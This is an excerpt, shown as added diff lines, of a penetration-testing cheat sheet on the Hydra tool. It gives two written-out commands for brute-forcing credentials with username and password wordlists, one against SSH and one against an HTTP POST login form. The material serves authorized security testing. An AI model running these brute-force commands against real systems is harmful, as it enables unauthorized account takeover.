curtishoughton/Penetration-Testing-Cheat-Sheet/password-cracking/hydra.md

 `hydra -L /path/to/username-list.txt -P /path/to/password-wordlist.txt -t 1 ssh://<IP_ADDRESS>`

 If SSH is running on a non-standard port, the `-s` parameter can be supplied to target an alternate port.

+### HTTP-POST-FORM

+To bruteforce a HTTP POST login form the following command can be used:

+hydra -L /path/to/username-list.txt -P /path/to/password-wordlist.txt http-post-form://<IP_ADDRESS>